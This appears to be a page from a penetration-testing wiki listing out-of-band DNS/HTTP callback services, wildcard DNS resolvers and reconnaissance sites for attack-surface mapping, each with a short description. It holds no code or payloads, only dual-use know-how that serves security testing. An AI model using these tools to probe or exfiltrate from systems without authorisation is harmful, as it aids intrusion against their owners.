Useful Tools
Resolution
DNSBin is a tool for testing DNS-based data exfiltration and out-of-band (OOB) interactions, useful for security testing scenarios like RCE or XXE where you need to confirm if a system can make DNS requests to an external domain you control.
pingb.in is a free DNS OOB exfiltration tool that allows security testers to receive and log DNS queries made by target systems, helping to verify vulnerabilities such as SSRF and RCE without needing to set up your own DNS server.
Mockbin lets you generate custom HTTP endpoints to capture, inspect, and mock HTTP requests and responses, making it ideal for testing webhooks, debugging HTTP clients, and simulating APIs.
Wildcard DNS
Wildcard DNS: Wildcard DNS records use an asterisk (*) to match any subdomain not explicitly defined, allowing all subdomains (e.g., *.example.com) to resolve to the same IP or resource with a single DNS entry.
http://xip.io/: xip.io provides a public wildcard DNS service that maps any subdomain containing an IP address (e.g., 10.0.0.1.xip.io) directly to that IP, simplifying local development and testing across devices without extra DNS configuration.
10.0.0.1.xip.io / www.10.0.0.1.xip.io / mysite.10.0.0.1.xip.io / foo.bar.10.0.0.1.xip.io: All these subdomains resolve to 10.0.0.1 using xip.io’s wildcard DNS, allowing you to use custom subdomains for different local development sites or virtual hosts, all pointing to the same IP.
nip.io is another free wildcard DNS service similar to xip.io, mapping any subdomain containing an IP address (e.g., 10.0.0.1.nip.io) to that IP, and supports multiple subdomain levels for flexible testing setups.
10.0.0.1.nip.io / app.10.0.0.1.nip.io / customer1.app.10.0.0.1.nip.io / customer2.app.10.0.0.1.nip.io / otherapp.10.0.0.1.nip.io: These are all examples of nip.io’s wildcard DNS, where any subdomain structure ending in an IP address and nip.io will resolve to that IP, useful for multi-tenant or segmented development environments
Reconnaissance
https://spyse.com/ (fully-fledged recon service)
Spyse is a comprehensive reconnaissance platform offering detailed information on domains, IPs, certificates, and infrastructure, supporting advanced security research and attack surface mapping.
https://dnsdumpster.com/ (DNS and subdomain recon)
DNSDumpster is a free online tool for DNS reconnaissance, enabling users to discover hosts, subdomains, and DNS records, and visualize domain infrastructure for security assessments.
Reverse IP Lookup (Domainmonitor)
This tool allows you to find all domains hosted on a single IP address, which is useful for identifying shared infrastructure or mapping an organization’s web presence.
Security headers (Security Report, missing headers)
Tools in this category analyze HTTP response headers to identify missing or misconfigured security headers, helping to assess a site’s security posture.
http://threatcrowd.org/ (WHOIS, DNS, email, and subdomain recon)
ThreatCrowd aggregates data from WHOIS, DNS, email, and subdomain sources to provide threat intelligence and help map relationships between domains and malicious activity.
https://mxtoolbox.com/ (wide range of DNS-related recon tools)
MXToolbox offers a suite of DNS-related tools, including MX record lookups, blacklist checks, and diagnostics for mail servers and domain configurations.
https://publicwww.com/ (Source Code Search Engine)
PublicWWW is a source code search engine that allows you to search for keywords, snippets, or technologies across the public web, aiding in reconnaissance and technology identification.
http://ipv4info.com/ (Find domains in the IP block owned by a Company/Organization)
ipv4info.com helps you find all domains and resources within a specific IP block owned by a company or organization, useful for mapping large network ranges.
HackerTarget Tools (DNS recon, site lookup, and scanning tools)
HackerTarget Tools: HackerTarget provides a collection of DNS reconnaissance, site lookup, and network scanning tools for penetration testers and security researchers.
VirusTotal (WHOIS, DNS, and subdomain recon)
VirusTotal: VirusTotal aggregates data from WHOIS, DNS, and subdomain sources, and scans files and URLs for malware, supporting threat intelligence and incident response.
crt.sh (SSL certificate search)
crt.sh: crt.sh is an SSL certificate search engine that lets you find all certificates issued for a given domain, which can reveal subdomains and related infrastructure.
Google CT (SSL certificate transparency search)
Google CT (Certificate Transparency): Google’s Certificate Transparency logs allow you to search for SSL certificates issued for any domain, aiding in subdomain discovery and monitoring unauthorized certificates.
PenTest Tools (Google dorks)
PenTest Tools (Google dorks): These tools leverage advanced Google search queries (dorks) to discover sensitive information, misconfigurations, or exposed assets indexed by search engines.
Wayback Machine (Find stuff which was hosted on the domain in past)
Wayback Machine: The Internet Archive’s Wayback Machine lets you view historical snapshots of websites, helping to uncover previously hosted content or endpoints.
FindSubdomains (Find subdomains using domain or keywords)
FindSubdomains: FindSubdomains is a service that discovers subdomains for a given domain or set of keywords, useful for expanding the attack surface during reconnaissance.
Last updated